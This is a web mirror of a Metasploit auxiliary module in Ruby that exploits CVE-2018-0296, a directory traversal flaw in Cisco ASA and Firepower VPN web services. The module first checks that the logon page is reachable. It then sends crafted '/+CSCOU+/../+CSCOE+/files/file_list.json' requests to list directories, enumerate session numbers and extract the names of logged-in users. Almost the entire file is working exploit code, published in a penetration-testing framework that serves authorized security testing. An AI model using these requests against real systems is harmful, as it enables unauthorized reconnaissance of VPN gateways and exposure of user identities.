Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/scanner/http/cisco_directory_traversal.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
8
include Msf::Exploit::Remote::HttpClient
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => 'Cisco ASA Directory Traversal',
15
'Description' => %q{
16
This module exploits a directory traversal vulnerability in Cisco's Adaptive Security Appliance (ASA) software and Firepower Threat Defense (FTD) software.
17
It lists the contents of Cisco's VPN web service which includes directories, files, and currently logged in users.
18
},
19
'Author' => [
20
'Michał Bentkowski', # Discovery
21
'Yassine Aboukir', # PoC
22
'Shelby Pace' # Metasploit Module
23
],
24
'License' => MSF_LICENSE,
25
'References' => [
26
[ 'CVE', '2018-0296' ],
27
[ 'EDB', '44956' ]
28
],
29
'DisclosureDate' => '2018-06-06',
30
'Notes' => {
31
'Reliability' => UNKNOWN_RELIABILITY,
32
'Stability' => UNKNOWN_STABILITY,
33
'SideEffects' => UNKNOWN_SIDE_EFFECTS
34
}
35
)
36
)
37
38
register_options(
39
[
40
OptString.new('TARGETURI', [ true, 'Path to Cisco installation', '/' ]),
41
OptBool.new('SSL', [ true, 'Use SSL', true ]),
42
Opt::RPORT(443)
43
]
44
)
45
end
46
47
def is_accessible?
48
uri = normalize_uri(target_uri.path, '+CSCOE+/logon.html')
49
50
res = send_request_cgi(
51
'method' => 'GET',
52
'uri' => uri
53
)
54
55
return (res && (res.body.include?("SSL VPN Service") || res.body.include?("+CSCOE+") || res.body.include?("+webvpn+") || res.body.include?("webvpnlogin")))
56
end
57
58
def list_files(path)
59
uri = normalize_uri(target_uri.path, path)
60
61
list_res = send_request_cgi(
62
'method' => 'GET',
63
'uri' => uri
64
)
65
66
if list_res && list_res.code == 200
67
if list_res.body.match(/\/{3}sessions/)
68
get_sessions(list_res.body)
69
else
70
print_good(list_res.body)
71
end
72
end
73
end
74
75
def get_sessions(response)
76
session_nos = response.scan(/([0-9]{2,})/)
77
78
if session_nos.empty?
79
print_status("Could not detect any sessions")
80
print("\n")
81
return
82
end
83
84
print_good(response)
85
list_users(session_nos)
86
end
87
88
def list_users(sessions)
89
sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
90
user_ids = Array.new
91
92
sessions.each do |session_no|
93
users_res = send_request_cgi(
94
'method' => 'GET',
95
'uri' => normalize_uri(target_uri.path, sessions_uri, session_no)
96
)
97
98
if users_res && users_res.body.include?('name')
99
user_ids.push(users_res.body.match(/user:(\w+)/).to_s)
100
end
101
end
102
103
unless user_ids.empty?
104
print_status('Users logged in:')
105
user_ids.each { |id| print_good(id) }
106
print("\n")
107
return
108
end
109
110
print_status("There are no users logged in currently")
111
end
112
113
def run
114
file_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'
115
sessions_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'
116
cscoe_uri = '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'
117
118
paths = [file_uri, sessions_uri, cscoe_uri]
119
120
unless is_accessible?
121
fail_with(Failure::NotFound, 'Failed to reach Cisco web logon service')
122
end
123
124
paths.each { |path| list_files(path) }
125
end
126
end
127
128